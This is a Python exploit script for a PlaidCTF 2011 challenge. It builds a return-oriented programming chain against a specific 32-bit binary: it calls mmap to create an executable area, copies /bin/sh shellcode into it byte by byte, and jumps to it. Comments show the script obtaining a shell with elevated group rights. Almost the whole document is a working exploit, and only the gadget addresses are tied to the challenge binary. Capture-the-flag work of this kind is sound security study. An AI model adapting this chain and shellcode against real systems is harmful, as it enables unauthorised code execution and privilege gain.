# file name : exploit.py
#!/usr/bin/env python
# pCTF 2011 - #19 Another small bug
# ROP: mmap an rwx area, copy the shellcode into it and jump to it
# $ { python exploit.py; cat; } |/opt/pctf/z2/exploitme 1300
# AAAAA[...]
# id
# uid=2015(z2_16) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
- from struct import pack,unpack
# Addresses inside the target binary (32-bit, little-endian; taken from
# the challenge binary, so they only make sense for that exact build).
mmap = 0x8049abc  # mmap() entry, the first call in the ROP chain
pop_4 = 0x8048973  # add esp, 0x10 -> skips 4 dwords
pop_14 = 0x8048d01  # add esp, 0x30 ; pop ebx ; pop esi -> skips 12 + 2 = 14 dwords
add_ecx_al = 0x8049cfd  # add [ecx], al -> one-byte write (acts as a store only where the byte is still 0)
pop_ecx = 0x804889f  # pop ecx
pop_eax = 0x804859f  # pop eax

# Where the rwx mapping is placed and how long it is.
area = 0x13370000
size = 0x10000

# /bin/sh - 23 bytes
SC = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
def copy_byte(address, byte):
    """Return the ROP fragment that writes one byte to ``address``.

    The fragment loads ``address`` into ecx and the byte value into eax,
    then returns into the ``add [ecx], al`` gadget.  Because that gadget
    adds instead of moving, it only behaves as a plain store when the
    destination byte is still zero - which is what this script relies on
    for the freshly mapped anonymous area (anonymous mappings are expected
    to start zero-filled).

    ``byte`` is a one-character string (Python 2 ``str``), as produced by
    indexing ``SC``.
    """
    dwords = [
        pop_ecx,      # pop ecx
        address,      # -> ecx = destination address
        pop_eax,      # pop eax
        ord(byte),    # -> al = byte value (upper bytes of eax are ignored)
        add_ecx_al,   # add [ecx], al
    ]
    return "".join(pack("<I", dword) for dword in dwords)
# 532 filler bytes; the overwritten return address is assumed to follow them
# (the offset comes from the original write-up and is not derived here).
p = "A" * 532

# 1) Return into mmap(area, size, PROT_READ|PROT_WRITE|PROT_EXEC,
#    MAP_PRIVATE|MAP_ANONYMOUS, -1, 0).  mmap's own return address is the
#    pop_14 gadget, which discards the 14 dwords that hold its arguments
#    (6 real arguments + 8 unused slots) before the chain continues.
mmap_args = [
    area,        # void *addr
    size,        # size_t length
    0x7,         # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)
    0x22,        # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)
    0xffffffff,  # int fd - MAP_ANONYMOUS => -1
    0,           # off_t offset
]
mmap_args += [0] * (14 - 6)  # unused slots consumed by pop_14
p += "".join(pack("<I", value) for value in [mmap, pop_14] + mmap_args)

# 2) Copy the shellcode one byte at a time, starting at area + 0xb so that
#    none of the packed destination addresses contains a 0x0a byte
#    (area + 0x0a would) - we don't want a 0x0a in the chain :)
for offset, byte in enumerate(SC):
    p += copy_byte(area + 0xb + offset, byte)

# 3) Return into the copied shellcode.
p += pack("<I", area + 0xb)

# Python 2: print adds the trailing newline that ends the input line.
print(p)